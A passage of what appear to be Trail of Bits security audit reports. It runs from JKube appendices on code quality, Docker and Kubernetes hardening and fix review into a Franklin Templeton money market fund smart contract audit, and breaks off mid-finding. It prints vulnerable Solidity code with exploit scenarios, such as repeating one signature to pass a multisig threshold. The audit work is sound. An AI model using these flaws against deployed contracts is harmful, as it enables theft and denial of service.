C.3: This format string has an extra argument. ( jkube/jkube-kit/build/service/docker/src/main/java/org/eclipse/jkube/kit /build/service/docker/access/hc/DockerAccessWithHcClient.java#476–477 ) ● The following issue appears to be fixed upstream. Consider removing the workaround or adjusting the comment if it is still desirable to keep Prometheus disabled. // Switch off Prometheus agent until logging issue with WildFly Swarm is resolved // See: // - https://github.com/fabric8io/fabric8-maven-plugin/issues/1173 // - https://issues.jboss.org/browse/THORN-1859 ret.put( "AB_PROMETHEUS_OFF" , "true" ); ret.put( "AB_OFF" , "true" ); Figure C.4: The code references an upstream issue that has been resolved. ( jkube/jkube-kit/jkube-kit-thorntail-v2/src/main/java/org/eclipse/jkube/t horntail/v2/generator/ThorntailV2Generator.java#41–46 ) ● The parsedCredentials array is indexed without first being checked to ensure that it has enough elements. This may cause the program to fail. This code is repeated in jkube/jkube-kit/build/api/src/main/java/org/eclipse/jkube/kit/bui ld/api/auth/RegistryAuth.java . public static AuthConfig fromCredentialsEncoded (String credentialsEncoded, String email) { final String credentials = new String(Base64.decodeBase64(credentialsEncoded)); final String[] parsedCredentials = credentials.split( ":" , 2 ) ; return AuthConfig.builder() .username(parsedCredentials[ 0 ]) .password( parsedCredentials[ 1 ] ) .email(email) .build(); } Figure C.5: parsedCredentials may have a single element in the array. ( jkube/jkube-kit/build/api/src/main/java/org/eclipse/jkube/kit/build/api/ auth/AuthConfig.java#89–97 ) ● The spring.devtools.remote.secret secret is logged as part of the printed command. This might not represent a security issue, as this particular secret is also stored in plaintext, but as a general practice, privileged information should not be logged. log.debug( "Running: " + command ); Figure C.6: The command string contains the mentioned secret. ( jkube/jkube-kit/jkube-kit-spring-boot/src/main/java/org/eclipse/jkube/sp ringboot/watcher/SpringBootWatcher.java#170 ) ● There are several occurrences across the codebase of parseInt calls on user input without adequate error handling. An invalid input on a user-provided property may cause JKube to throw an exception. D. Docker Recommendations This appendix provides general recommendations regarding the use of Docker. We recommend using the steps listed under the "Basic Security" and "Limiting Container Privileges" sections and avoiding the options listed under the "Options to Avoid" section. This appendix also describes the Linux features that form the basis of Docker container security measures and includes a list of additional references. Basic Security ● ● ● ● ● Do not add users to the docker group. Inclusion in the docker group allows a user to escalate his or her privileges to root without authentication. Do not run containers as a root user . If user namespaces are not used, the root user within the container will be the real root user on the host. Instead, create another user within the Docker image and set the container user by using the USER instruction in the image’s Dockerfile specification. Alternatively, pass in the --user $UID:$GID flag to the docker run command to set the user and user group. Do not use the --privileged flag . Using this flag allows the process within the container to access all host resources, hijacking the machine. Do not mount the Docker daemon socket (usually /var/run/docker.sock ) into the container. A user with access to the Docker daemon socket will be able to spawn a privileged container to “escape” the container and access host resources. Carefully weigh the risks inherent in mounting volumes from special filesystems such as /proc or /sys into a container. If a container has write access to the mounted paths, a user may be able to gain information about the host machine or escalate his or her own privileges. Limiting Container Privileges ● ● ● Pass the --cap-drop=all flag to the docker run command to drop all Linux capabilities and enable only those capabilities that are necessary to the process within a container using the --cap-add=... flag. Note, though, that adding capabilities could allow the process to escalate its privileges and “escape” the container. Pass the --security-opt=no-new-privileges:true flag to the docker run command to prevent processes from gaining additional privileges. Limit the resources provided to a container process to prevent denial-of-service scenarios. ● Do not use root ( uid=0 or gid=0 ) in a container if it is not needed. Use USER ... in the Dockerfile (or use docker run --user $UID:$GID ... ). The following recommendations are optional: ● ● ● Use user namespaces to limit the user and group IDs available in the container to only those that are mapped from the host to the container. Adjust the Seccomp and AppArmor profiles to further limit container privileges. Consider using SELinux instead of AppArmor to gain additional control over the operations a given container can execute. Options to Avoid Flag Description --privileged Gives all kernel capabilities to the container and lifts all the limitations enforced by the device cgroup controller (i.e., allowing the container to do almost everything that the host can do) --cap-add=all Adds all Linux capabilities --security-opt apparmor=unconfined --security-opt seccomp=unconfined Disables AppArmor Disables Seccomp --device-cgroup-rule='a *:* rwm' Enables access to all devices (according to this documentation ) --pid=host Uses the host PID namespace --uts=host Uses the host UTS namespace --network=host Uses the host network namespace, which grants access to all network interfaces available on a host Linux Features Foundational to Docker Container Security Feature Description Namespaces This feature is used to isolate or limit the view (and therefore the use) of a global system resource. There are various namespaces, such as PID , network , mount , UTS , IPC , user , and cgroup , each of which wraps a different resource. For example, if a process creates a new PID namespace, the process will act as if its PID is 1 and will not be able to send signals to processes created in its parent namespace. The namespaces to which a process belongs are listed in the /proc/$PID/ns/ directory (each with its own ID) and can also be accessed by using the lsns tool . Control groups (cgroups) This is a mechanism for grouping processes/tasks into hierarchical groups and metering or limiting resources within those groups, such as memory, CPUs, I/Os, or networks. Linux capabilities The cgroups to which a process belongs can be read from the /proc/$PID/cgroup file. A cgroup’s entire hierarchy will be indicated in a /sys/fs/cgroup// directory if the cgroup controllers are mounted in that directory. (Use the mount | grep cgroup command to see whether they are.) There are two versions of cgroups, cgroups v1 and cgroups v2 , which can be (and often are) used at the same time. This feature splits root privileges into "capabilities." Although this setting is primarily related to the actions a privileged user can take, there are different process capability sets, some of which are used to calculate the user’s effective capabilities (such as after running an SUID binary). Therefore, dropping all Linux capabilities from all capability sets will help prevent a process from gaining additional privileges (such as through SUID binaries). The Linux process capability sets for a given process can be read from the /proc/$PID/status file, specifically its CapInh , CapPrm , CapEff , CapBnd , and CapAmb values (which correspond to the inherited, permitted, effective, bound, and ambient capability sets, respectively). Those values can be decoded into meaningful capability names by using the capsh --decode=$VALUE tool. While the effective capability set is the one that is directly used by the kernel to execute permission checks, it is best practice to limit all other sets too, since they may allow for gaining more effective capabilities, such as through SUID binaries or programs that have “ file capabilities ” set. The “no new privileges” flag Enabling this flag for a process will prevent the user who launched the process from gaining additional privileges (such as through SUID binaries). Seccomp BPF syscall filtering Seccomp BPF enables the filtering of arguments passed in to a program and the syscalls executed by it. It does this by writing a “BPF program” that is later run in the kernel. Refer to the Docker default Seccomp policy . One can write a similar profile and apply it with the --security-opt seccomp= flag. AppArmor Linux Security Module (LSM) AppArmor is LSM that limits a container’s access to certain resources by enforcing a mandatory access control. AppArmor profiles are loaded into a kernel. A profile can be in either “complain” or “enforce” mode. In “complain” mode, violation attempts are logged only into the syslog; in “enforce” mode, such attempts are blocked. To see which profiles are loaded into a kernel, use the aa-status tool . To see whether a given process will work under the rules of an AppArmor profile, read the /proc/$PID/attr/current file. If AppArmor is not enabled for the process, the file will contain an unconfined value. If it is enabled, the file will return the name of the policy and its mode (e.g., docker-default (enforce) ). Refer to the Docker AppArmor profile template and the generated form of the profile . Additional References ● ● ● ● Understanding Docker Container Escapes : A Trail of Bits blog post that breaks down a container escape technique and explains the constraints required to use that technique Namespaces in Operation, Part 1: Namespaces Overview : A seven-part LWN article that provides an overview of Linux namespace features False Boundaries and Arbitrary Code Execution : An old but thorough post about Linux capabilities and the ways that they can be used in privilege escalation attempts Technologies for Container Isolation: A Comparison of AppArmor and SELinux : A comparison of AppArmor and SELinux E. Hardening Containers Run via Kubernetes This appendix gives more context for the hardening of containers spawned by Kubernetes. Please note our definitions of the following terms: ● ● Container: This is the isolated “environment” created by Linux features such as namespaces, cgroups, Linux capabilities, and AppArmor and secure computing (seccomp) profiles. We are specifically concerned with Docker containers since the tested environment uses Docker as its container engine. Host: This is the unconfined environment on the machine running a container (e.g., a process run in global Linux namespaces). Root Inside Container User namespaces allow for the remapping of user and group IDs between a host and a container; unless namespaces are used, the root user inside the container will be the root user in the host. In a default configuration of Docker containers, the container features limit the actions that the root user can take. However, if a process does not need to be run as root, it is best to run it with another user. To run a container with another user, use the USER Dockerfile instructions . In Kubernetes, one can specify the user ID (UID) and various group IDs (GIDs) (e.g., a primary GID, a file system–related GID, and those for supplemental groups) using the runAsUser , runAsGroup , fsGroup , and supplementalGroups attributes of a securityContext field of a pod or other objects used to spawn containers. Dropping Linux Capabilities Linux capabilities split the privileged actions that a root user’s process can perform. Docker drops most Linux capabilities for security purposes but leaves others enabled for convenience . We recommend dropping all Linux capabilities and then enabling only those necessary for the application to function properly. Linux capabilities can be dropped in Docker via the --cap-drop=all flag and in Kubernetes by specifying capabilities , drop , and --all in the securityContext key of the deployment’s container configuration. Then, to restore necessary capabilities, use the --cap-add= flag in a docker run or specify them in capabilities , and use add in the securityContext field in the Kubernetes object manifest. NoNewPrivs Flag The NoNewPrivs flag prevents additional privileges for a process or its children from being assigned. For example, it prevents a UID/GID from gaining capabilities or privileges by executing setuid binaries. The NoNewPrivs flag can be enabled in a docker run via the --security-opt=no-new-privileges flag. In a Kubernetes deployment, specify allowPrivilegeEscalation: false in the securityContext field to enable it. Seccomp Policies A seccomp policy limits the available system calls and their arguments. Normally, using seccomp requires a call to a prctl syscall with a special structure, but Docker simplifies the process and allows a seccomp policy to be specified as a JSON file . Using the default Docker profile is a good start for implementing a specific policy. Seccomp is disabled by default in Kubernetes . The seccomp policy can be specified with a --security-opt seccomp= flag in Docker. In Kubernetes, the seccomp policy can be set either by using a seccompProfile key in the securityContext field of a pod (in Kubernetes v1.19 or later) or by using the container.seccomp.security.alpha.kubernetes.io/: annotation (in pre-v1.19 versions). The Kubernetes documentation includes examples of both methods of setting a specific seccomp policy . Linux Security Module (AppArmor) The LSM is a mechanism that allows kernel developers to hook various kernel calls. AppArmor is an LSM used by default in Docker . Another popular LSM is SELinux, but since it is more difficult to set up, it is not discussed here. AppArmor limits what a process can do and which resources a process can interact with. Docker uses its default AppArmor profile, which is generated from this template . When Docker is used as a container engine in Kubernetes, the same profile is often used by default, depending on the Kubernetes cluster configuration. One can override the AppArmor profile in Kubernetes with the following annotation (which is further described here ): container.apparmor.security.beta.kubernetes.io/: F. Fix Review Results When undertaking a fix review, reviews the fixes implemented for issues identified in the original report. This work involves a review of specific areas of the source code and system configuration, not comprehensive analysis of the system. On July 7, 2023, reviewed the fixes and mitigations implemented by the JKube team for the issues identified in this report. We reviewed each fix to determine its effectiveness in resolving the associated issue. In summary, of the two issues described in this report, the JKube team has resolved one and has partially resolved the other. In addition to fixing the potential command line injection issue, the fixes include a new enricher that improves the generated configuration for Kubernetes objects, using more secure settings. JKube users must explicitly opt in to use this new enricher. For additional information, please see the Detailed Fix Review Results below. ID Title Severity Status Detailed Fix Review Results TOB-JKUBE-1: Insecure defaults in generated artifacts Partially resolved in PR #2177 and PR #2182 . These pull requests introduce a new enricher that enforces several security best practices and recommendations for Kubernetes objects. However, this enricher is not enabled in the default configuration, which means that the generated deployment artifacts remain insecure by default unless the user enables this new feature. TOB-JKUBE-2: Risk of command line injection from secret Resolved in PR #2169 . Among other changes, this pull request rewrote the command-line building code to use an array of arguments instead of a single command-line string. This way of invoking external programs does not present the same injection risk that was identified in the previous code with string interpolation. G. Fix Review Status Categories The following table describes the statuses used to indicate whether an issue has been sufficiently addressed. Fix Status Status Description Undetermined The status of the issue was not determined during this engagement. Unresolved The issue persists and has not been resolved. Partially Resolved The issue persists but has been partially resolved. Resolved The issue has been sufficiently resolved. diff --git a/findings_newupdate/tob/2023-05-franklintempleton-moneymarket-securityreview.txt b/findings_newupdate/tob/2023-05-franklintempleton-moneymarket-securityreview.txt new file mode 100644 index 0000000..d9dcb13 --- /dev/null +++ b/findings_newupdate/tob/2023-05-franklintempleton-moneymarket-securityreview.txt @@ -0,0 +1,15 @@ +1. Canceling all transaction requests causes DoS on MMF system Severity: High Difficulty: Low Type: Access Controls Finding ID: TOB-FTMMF-01 Target: FT/TransferAgentGateway.sol , FT/infrastructure/modules/TransactionalModule.sol Description Any shareholder can cancel any transaction request, which can result in a denial of service (DoS) from the MMF system. The TransactionalModule contract uses transaction requests to store buy and sell orders from users. These requests are settled at the end of the day by the admins. Admins can create or cancel a request for any user. Users can create requests for themselves and cancel their own requests. The TransferAgentGateway contract is an entry point for all user and admin actions. It implements access control checks and forwards the calls to their respective modules. The cancelRequest function in the TransferAgentGateway contract checks that the caller is the owner or a shareholder. However, if the caller is not the owner, the caller is not matched against the account argument. This allows any shareholder to call the cancelRequest function in the TransactionalModule for any account and requestId . function cancelRequest ( address account , bytes32 requestId , string calldata memo ) external override { require ( msg.sender == owner() || IAuthorization( moduleRegistry.getModuleAddress(AUTHORIZATION_MODULE) ).isAccountAuthorized( msg.sender ), "OPERATION_NOT_ALLOWED_FOR_CALLER" ); ICancellableTransaction( moduleRegistry.getModuleAddress(TRANSACTIONAL_MODULE) ).cancelRequest(account, requestId, memo); } Figure 1.1: The cancelRequest function in the TransferAgentGateway contract As shown in figure 1.2, the if condition in the cancelRequest function in the TransactionalModule contract implements a check that does not allow shareholders to cancel transaction requests created by the admin. However, this check passes because the TransferAgentGateway contract is set up as the admin account in the authorization module. function cancelRequest ( address account , bytes32 requestId , string calldata memo ) external override onlyAdmin onlyShareholder(account) { require ( transactionDetailMap[requestId].txType > ITransactionStorage.TransactionType.INVALID, "INVALID_TRANSACTION_ID" ); if (!transactionDetailMap[requestId].selfService) { require ( IAuthorization(modules.getModuleAddress(AUTHORIZATION_MODULE)) .isAdminAccount( msg.sender ), "CALLER_IS_NOT_AN_ADMIN" ); } require ( pendingTransactionsMap[account].remove(requestId), "INVALID_TRANSACTION_ID" ); delete transactionDetailMap[requestId]; accountsWithTransactions.remove(account); emit TransactionCancelled(account, requestId, memo); } Figure 1.2: The cancelRequest function in the TransactionalModule contract Thus, a shareholder can cancel any transaction request created by anyone. Exploit Scenario Eve becomes an authorized shareholder and sets up a bot to listen to the TransactionSubmitted event on the TransactionalModule contract. The bot calls the cancelRequest function on the TransferAgentGateway contract for every event and cancels all the transaction requests before they are settled, thus executing a DoS attack on the MMF system. Recommendations Short term, add a check in the TransferAgentGateway contract to allow shareholders to cancel requests only for their own accounts. Long term, document access control rules in a publicly accessible location. These rules should encompass admin, non-admin, and common functions. Ensure the code adheres to that specification by extending unit test coverage for positive and negative expectations within the system. Add fuzz tests where access control rules are the invariants under test. +2. Lack of validation in the IntentValidationModule contract can lead to inconsistent state Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-FTMMF-02 Target: FT/infrastructure/modules/IntentValidationModule.sol Description Lack of validation in the state-modifying functions of the IntentValidationModule contract can cause users to be locked out of the system. As shown in figure 2.1, the setDeviceKey function in IntentValidationModule allows adding a device ID and key to multiple accounts, which may result in the unauthorized use of a device ID. function setDeviceKey ( address account , uint256 deviceId , string memory key ) external override onlyAdmin { devicesMap[account].add(deviceId); deviceKeyMap[deviceId] = key; emit DeviceKeyAdded(account, deviceId); } Figure 2.1: The setDeviceKey functions in the IntentValidationModule contract Additionally, a lack of validation in the clearDeviceKey and clearAccountKeys functions can cause the key for a device ID to become zero, which may prevent users from authenticating their requests. function clearDeviceKey ( address account , uint256 deviceId ) external override onlyAdmin { _removeDeviceKey(account, deviceId); } function clearAccountKeys ( address account ) external override onlyAdmin { uint256 [] memory devices = devicesMap[account].values(); for ( uint i = 0 ; i < devices.length; ) { _removeDeviceKey(account, devices[i]); unchecked { i++; } } } Figure 2.2: Functions to clear device ID and key in the IntentValidationModule contract The account-to–device ID mapping and device ID–to-key mapping are used to authenticate user actions in an off-chain component, which can malfunction in the presence of these inconsistent states and lead to the authentication of malicious user actions. Exploit Scenario An admin adds the DEV_A device and the KEY_K key to Bob. Then there are multiple scenarios to cause an inconsistent state, such as the following: Adding one device to multiple accounts: 1. An admin adds the DEV_A device and the KEY_K key to Alice by mistake. 2. Alice can use Bob’s device to send unauthorized requests. Overwriting a key for a device ID: 1. An admin adds the DEV_A device and the KEY_L key to Alice, which overwrites the key for the DEV_A device from KEY_K to KEY_L . 2. Bob cannot authenticate his requests with his KEY_K key. Setting a key to zero for a device ID: 1. An admin adds the DEV_A device and the KEY_K key to Alice by mistake. 2. An admin removes the DEV_A device from Alice’s account. This sets the key for the DEV_A device to zero, which is still added to Bob’s account. 3. Bob cannot authenticate his requests with his KEY_K key. Recommendations Short term, make the following changes: ● ● Add a check in the setDeviceKey function to ensure that a device is not added to multiple accounts. Add a new function to update the key of an already added device with correct validation checks for the update. Long term, document valid system states and the state transitions allowed from each state. Ensure proper data validation checks are added in all state-modifying functions with unit and fuzzing tests. +3. Pending transactions cannot be settled Severity: Medium Difficulty: Low Type: Data Validation Finding ID: TOB-FTMMF-03 Target: FT/infrastructure/modules/TransactionalModule.sol , FT/infrastructure/modules/TransferAgentModule.sol , FT/MoneyMarketFund.sol Description An account removed from the accountsWithTransactions state variable will have its pending transactions stuck in the system, resulting in an opportunity cost loss for the users. The accountsWithTransactions state variable in the TransactionalModule contract is used to keep track of accounts with pending transactions. It is used in the following functions: ● ● The getAccountsWithTransactions function to return the list of accounts with pending transactions The hasTransactions function to check if an account has pending transactions. However, the cancelRequest function in the TransactionalModule contract removes the account from the accountsWithTransactions list for every cancellation. If an account has multiple pending transactions, canceling only one of the transaction requests will remove the account from the accountsWithTransactions list. function cancelRequest ( address account , bytes32 requestId , string calldata memo ) external override onlyAdmin onlyShareholder(account) { require ( transactionDetailMap[requestId].txType > ITransactionStorage.TransactionType.INVALID, "INVALID_TRANSACTION_ID" ); if (!transactionDetailMap[requestId].selfService) { require ( IAuthorization(modules.getModuleAddress(AUTHORIZATION_MODULE)) .isAdminAccount( msg.sender ), "CALLER_IS_NOT_AN_ADMIN" ); } require ( pendingTransactionsMap[account].remove(requestId), "INVALID_TRANSACTION_ID" ); delete transactionDetailMap[requestId]; accountsWithTransactions.remove(account); emit TransactionCancelled(account, requestId, memo); } Figure 3.1: The cancelRequest function in the TransactionalModule contract In figure 3.1, the account has pending transactions, but it is not present in the accountsWithTransactions list. The off-chain components and other functionality relying on the getAccountsWithTransactions and hasTransactions functions will see these accounts as not having any pending transactions. This may result in non-settlement of the pending transactions for these accounts, leading to a loss for the users. Exploit Scenario Alice, a shareholder, creates multiple transaction requests and cancels the last request. For the next settlement process, the off-chain component calls the getAccountsWithTransactions function to get the list of accounts with pending transactions and settles these accounts. After the settlement run, Alice checks her balance and is surprised that her transaction requests are not settled. She loses profits from upcoming market movements. Recommendations Short term, have the code use the unlistFromAccountsWithPendingTransactions function in the cancelRequest function to update the accountsWithTransactions list. Long term, document the system state machine specification and follow it to ensure proper data validation checks are added in all state-modifying functions. +4. Deauthorized accounts can keep shares of the MMF Severity: Medium Difficulty: High Type: Data Validation Finding ID: TOB-FTMMF-04 Target: FT/infrastructure/modules/AuthorizationModule.sol Description An unauthorized account can keep shares if the admin deauthorizes the shareholder without zeroing their balance. This can lead to legal issues because unauthorized users can keep shares of the MMF. The deauthorizeAccount function in the AuthorizationModule contract does not check that the balance of the provided account is zero before revoking the ROLE_FUND_AUTHORIZED role: function deauthorizeAccount ( address account ) external override onlyRole(ROLE_AUTHORIZATION_ADMIN) { require (account != address ( 0 ), "INVALID_ADDRESS" ); address txModule = modules.getModuleAddress( keccak256 ( "MODULE_TRANSACTIONAL" ) ); require (txModule != address ( 0 ), "MODULE_REQUIRED_NOT_FOUND" ); require ( hasRole(ROLE_FUND_AUTHORIZED, account), "SHAREHOLDER_DOES_NOT_EXISTS" ); require ( !ITransactionStorage(txModule).hasTransactions(account), "PENDING_TRANSACTIONS_EXIST" ); _revokeRole(ROLE_FUND_AUTHORIZED, account); emit AccountDeauthorized(account); } Figure 4.1: The deauthorizeAccount function in the AuthorizationModule contract If an admin account deauthorizes a shareholder account without making the balance zero, the unauthorized account will keep the shares of the MMF. The impact is limited, however, because the unauthorized account will not be able to liquidate the shares. The admin can also adjust the balance of the account to make it zero. However, if the admin forgets to adjust the balance or is unable to adjust the balance, it can lead to an unauthorized account holding shares of the MMF. Recommendations Short term, add a check in the deauthorizeAccount function to ensure that the balance of the provided account is zero. Long term, document the system state machine specification and follow it to ensure proper data validation checks are added in all state-modifying functions. Add fuzz tests where the rules enforced by those validation checks are the invariants under test. +5. Solidity compiler optimizations can be problematic Severity: Informational Difficulty: Low Type: Undefined Behavior Finding ID: TOB-FTMMF-05 Target: ./hardhat.config.js Description The MMF has enabled optional compiler optimizations in Solidity. According to a November 2018 audit of the Solidity compiler , the optional optimizations may not be safe . optimizer: { enabled: true , runs: 200 , }, Figure 5.1: Hardhat optimizer enabled in hardhat.config.js Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild use them. Therefore, it is unclear how well they are being tested and exercised. Moreover, optimizations are actively being developed . High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten -generated solc-js compiler used by Truffle and Remix persisted until late 2018; the fix for this bug was not reported in the Solidity changelog. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6 . More recently, another bug due to the incorrect caching of Keccak-256 was reported. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations—or in the Emscripten transpilation to solc-js —causes a security vulnerability in the MMF contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity. +6. Project dependencies contain vulnerabilities Severity: Undetermined Difficulty: High Type: Patching Finding ID: TOB-FTMMF-06 Target: ./package.json Description Although dependency scans did not identify a direct threat to the project codebase, npm audit found dependencies with known vulnerabilities. Due to the sensitivity of the deployment code and its environment, it is important to ensure dependencies are not malicious. Problems with dependencies in the JavaScript community could have a significant effect on the MMF system. The output detailing the identified issues has been included below: Dependency Version ID Description flat <5.0.1 CVE-2020-36632 flat vulnerable to prototype pollution @openzeppelin/contracts 3.2.0 - CVE-2023-30541 4.8.2 @openzeppelin/contracts -upgradeable >= 3.2.0, < 4.8.3 CVE-2023-30541 OpenZeppelin contracts’ TransparentUpgradeableProxy clashing selector calls may not be delegated OpenZeppelin contracts’ TransparentUpgradeableProxy clashing selector calls may not be delegated minimatch request < 3.0.5 CVE-2022-3517 minimatch ReDoS vulnerability <= 2.88.2 CVE-2023-28155 Server-side request forgery in request Table 6.1: npm audit output Exploit Scenario Alice installs the dependencies for this project on a clean machine. Unbeknownst to Alice, a dependency of the project has become malicious or exploitable. Alice subsequently uses the vulnerable dependency, disclosing sensitive information to an unknown actor. Recommendations Short term, ensure dependencies are up to date. Several node modules have been documented as malicious because they execute malicious code when installing dependencies to projects. Keep modules current and verify their integrity after installation. Long term, consider integrating automated dependency auditing into the development workflow. If dependencies cannot be updated when a vulnerability is disclosed, ensure that the project codebase does not use and is not affected by the dependency’s vulnerable functionality. +7. Unimplemented getVersion function returns default value of zero Severity: Informational Difficulty: Low Type: Undefined Behavior Finding ID: TOB-FTMMF-07 Target: FT/infrastructure/modules/TransferAgentModule.sol Description The getVersion function within the TransferAgentModule contract is not implemented; at present, it yields the default uint8 value of zero. function getVersion() external pure virtual override returns ( uint8 ) {} Figure 7.1: Unimplemented getVersion function in the TransferAgentModule contract The other module contracts establish a pattern where the getVersion function is supposed to return a value of one. function getVersion() external pure virtual override returns ( uint8 ) { return 1; } Figure 7.2: Implemented getVersion function in the TransactionalModule contract Exploit Scenario Alice calls the getVersion function on the TransferAgentModule contract. It returns zero, and all the other module contracts return one. Alice misunderstands the system and which contracts are on what version of their lifecycle. Recommendations Short term, implement the getVersion function in the TransferAgentModule contract so it matches the specification established in the other modules. Long term, use the Slither static analyzer to catch common issues such as this one. Implement slither-action into the project’s CI pipeline. +8. The MultiSigGenVerifier threshold can be passed with a single signature Severity: High Difficulty: Medium Type: Data Validation Finding ID: TOB-FTMMF-08 Target: FT/infrastructure/multisig/MultiSigGenVerifier.sol Description A single signature can be used multiple times to pass the threshold in the MultiSigGenVerifier contract, allowing a single signer to take full control of the system. The signedDataExecution function in the MultiSigGenVerifier contract verifies provided signatures and accumulates the acquiredThreshold value in a loop as shown in figure 8.1: for ( uint256 i = 0 ; i < signaturesCount; i++) { (v, r, s) = _splitSignature(signatures, i); address signerRecovered = ecrecover( hash , v, r, s); if (signersSet.contains(signerRecovered)) { acquiredThreshold += signersMap[signerRecovered]; } } Figure 8.1: The signer recovery section of the signedDataExecution function in the MultiSigGenVerifier contract This code checks whether the recovered signer address is one of the previously added signers and adds the signer’s weight to acquiredThreshold . However, the code does not check that all the recorded signers are unique, which allows the submitter to pass the threshold with only a single signature to execute the signed transaction. The current function has an implicit zero-address check in the subsequent if statement—to add new signers, they must not be address(0) . If this logic changes in the future, the impact of the ecrecover function returning address(0) (which happens when a signature is malformed) must be carefully reviewed. Exploit Scenario Eve, a signer, colludes with a submitter to settle their transactions at a favorable date and price. Eve signs the transaction and provides it to the submitter. The submitter uses this signature to call the signedDataExecution function by repeating the same signature multiple times in the signatures argument array to pass the threshold. Using this method, Eve can execute any admin transaction without consent from other admins. Recommendations Short term, have the code verify that the signatures provided to the signedDataExecution function are unique. One way of doing this is to sort the signatures in increasing order of the signer addresses and verify this order in the loop. An example of this order verification code is shown in figure 8.2: address lastSigner = address(0); for ( uint256 i = 0 ; i < signaturesCount; i++) { (v, r, s) = _splitSignature(signatures, i); address signerRecovered = ecrecover( hash , v, r, s); require (lastSigner < signerRecovered); lastSigner = signerRecovered; if (signersSet.contains(signerRecovered)) { acquiredThreshold += signersMap[signerRecovered]; } } Figure 8.2: An example code to verify uniqueness of the provided signatures Long term, expand unit test coverage to account for common edge cases, and carefully consider all possible values for any user-provided inputs. Implement fuzz testing to explore complex scenarios and find difficult-to-detect bugs in functions with user-provided inputs. +9. Shareholders can renounce their authorization role Severity: Low Difficulty: Low Type: Data Validation Finding ID: TOB-FTMMF-09 Target: FT/infrastructure/modules/AuthorizationModule.sol Description Shareholders can renounce their authorization role. As a result, system contracts that check for authorization and off-chain components may not work as expected because of an inconsistent system state. The AuthorizationModule contract extends the AccessControlUpgradeable contract from the OpenZeppelin library. The AccessControlUpgradeable contract has a public renounceRole function, which can be called by anyone to revoke a role on their own account. function renounceRole ( bytes32 role , address account ) public virtual override { require (account == _msgSender(), "AccessControl: can only renounce roles for self" ); _revokeRole(role, account); } Figure 9.1: The renounceRole function of the base contract from the OpenZeppelin library Any shareholder can use the renounceRole function to revoke the ROLE_FUND_AUTHORIZED role on their own account without authorization from the admin. This role is used in three functions in the AccessControlUpgradeable contract: 1. The isAccountAuthorized function to check if an account is authorized 2. The getAuthorizedAccountsCount to get the number of authorized accounts 3. The getAuthorizedAccountAt to get the authorized account at an index Other contracts and off-chain components relying on these functions may find the system in an inconsistent state and may not be able to work as expected. Exploit Scenario Eve, an authorized shareholder, renounces her ROLE_FUND_AUTHORIZED role. The off-chain components fetch the number of authorized accounts, which is one less than the expected value. The off-chain component is now operating on an inaccurate contract state. Recommendations Short term, have the code override the renounceRole function in the AuthorizationModule contract. Make this overridden function an admin-only function. Long term, read all the library code to find public functions exposed by the base contracts and override them to implement correct business logic and enforce proper access controls. Document any changes between the original OpenZeppelin implementation and the MMF implementation. Be sure to thoroughly test overridden functions and changes in unit tests and fuzz tests. +10. Risk of multiple dividend payouts in a day Severity: Medium Difficulty: High Type: Data Validation Finding ID: TOB-FTMMF-10 Target: FT/infrastructure/modules/TransferAgentModule.sol, FT/MoneyMarketFund.sol Description The fund manager can lose the system’s money by making multiple dividend payouts in a day when they should be paid out only once a day. The distributeDividends function in the MoneyMarketFund contract takes the date as an argument. This date value is not validated to be later than the date from an earlier execution of the distributeDividends function. function distributeDividends ( address [] calldata accounts, uint256 date , int256 rate , uint256 price ) { } external onlyAdmin onlyWithValidRate(rate) onlyValidPaginationSize(accounts.length, MAX_ACCOUNT_PAGE_SIZE) lastKnownPrice = price; for ( uint i = 0 ; i < accounts.length; ) { _processDividends(accounts[i], date, rate, price); unchecked { i++; } } Figure 10.1: The distributeDividends function in the MoneyMarketFund contract As a result, the admin can distribute dividends multiple times a day, which will result in the loss of funds from the company to the users. The admin can correct this mistake by using the adjustBalance function, but adjusting the balance for all the system users will be a difficult and costly process. The same issue also affects the following three functions: 1. The endOfDay function in the MoneyMarketFund contract 2. The distributeDividends function in the TransferAgentModule contract 3. The endOfDay function in the TransferAgentModule contract. Exploit Scenario The admin sends a transaction to distribute dividends. The transaction is not included in the blockchain because of congestion or gas estimation errors. Forgetting about the earlier transaction, the admin sends another transaction, and both transactions are executed to distribute dividends on the same day. Recommendations Short term, have the code store the last dividend distribution date and validate that the date argument in all the dividend distribution functions is later than the last stored dividend date. Long term, document the system state machine specification and follow it to ensure proper data validation checks are added to all state-modifying functions. +11. Shareholders can stop admin from deauthorizing them Severity: High Type: Timing Difficulty: Medium Finding ID: TOB-FTMMF-11 Target: FT/infrastructure/modules/AuthorizationModule.sol Description Shareholders can prevent the admin from deauthorizing them by front-running the deauthorizeAccount function in the AuthorizationModule contract. The deauthorizeAccount function reverts if the provided account has one or more pending transactions. function deauthorizeAccount ( address account ) external override onlyRole(ROLE_AUTHORIZATION_ADMIN) { require (account != address ( 0 ), "INVALID_ADDRESS" ); address txModule = modules.getModuleAddress( keccak256 ( "MODULE_TRANSACTIONAL" ) ); require (txModule != address ( 0 ), "MODULE_REQUIRED_NOT_FOUND" ); require ( hasRole(ROLE_FUND_AUTHORIZED, account), "SHAREHOLDER_DOES_NOT_EXISTS" ); require ( !ITransactionStorage(txModule).hasTransactions(account), "PENDING_TRANSACTIONS_EXIST" ); _revokeRole(ROLE_FUND_AUTHORIZED, account); emit AccountDeauthorized(account); } Figure 11.1: The deauthorizeAccount function in the AuthorizationModule contract A shareholder can front-run a transaction executing the deauthorizeAccount function for their account by submitting a new transaction request to buy or sell shares. The deauthorizeAccount transaction will revert because of a pending transaction for the shareholder. Exploit Scenario Eve, a shareholder, sets up a bot to front-run all deauthorizeAccount transactions that add a new transaction request for her. As a result, all admin transactions to deauthorize Eve fail. Recommendations Short term, remove the check for the pending transactions of the provided account and consider one of the following: 1. Have the code cancel the pending transactions of the provided account in the deauthorizeAccount function. 2. Add a check in the _processSettlements function in the MoneyMarketFund contract to skip unauthorized accounts. Add the same check in the _processSettlements function in the TransferAgentModule contract. Long term, always analyze all contract functions that can be affected by attackers front-running calls to manipulate the system. +12. Total number of submitters in MultiSigGenVerifier contract can be more than allowed limit of 